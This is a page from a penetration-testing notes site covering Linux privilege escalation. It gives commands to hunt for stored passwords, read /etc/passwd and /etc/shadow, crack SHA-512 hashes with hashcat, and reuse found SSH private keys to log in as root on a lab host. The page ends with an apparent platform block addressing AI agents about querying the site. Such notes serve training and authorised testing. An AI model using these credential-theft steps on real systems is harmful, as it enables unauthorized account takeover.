> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/linux/privesc/pass-file-perm.md). # Password and file permission ## Stored Passwords * `history` or `cat .bash_history` will show previous command and will sometines leak password * `find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;` * Sometimes a simple `ls` or `ls -la` will give interesting files ## Weak File permission * Do we have access to file that we shouldn't? * `ls -la /etc/passwd` * This used to store password * If we can modify the file we can remove the x, we could change the num of the group of our user to become part of root group * `ls -la /etc/shadow` * We can copy the content of `/etc/passwd` in a file in our attacking machine * we can then use `unshadow` `unshadow passwd shadow`\ ![image](https://user-images.githubusercontent.com/96747355/167272581-c345c457-a9c3-4cf5-a925-e1e88d66cb36.png) * We can then copy this output in another file and just keep the users with the hash ![image](https://user-images.githubusercontent.com/96747355/167272620-3ac73fdf-767f-45b6-96b6-044950186a05.png) * We can now look for the hash on [hashcat.net](https://hashcat.net/wiki/doku.php?id=example_hashes) our hashes start with `$6$` so we can ctrl+F this and this will give us the mode number to use. * `hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt -O` ![image](https://user-images.githubusercontent.com/96747355/167272817-b884a708-a2b6-47e7-b4da-50b909b62536.png) ## SSH keys * `find / -name authorized_keys 2> /dev/null` * `find / -name id_rsa 2> /dev/null` * If we find an id\_rsa key, we can copy it in our machine and use it to log in * Before using it we have to change the right `chmod 600 id_rsa` * And then we can just `ssh -i id_rsa root@10.10.240.48` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://csbygb.gitbook.io/pentips/linux/privesc/pass-file-perm.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.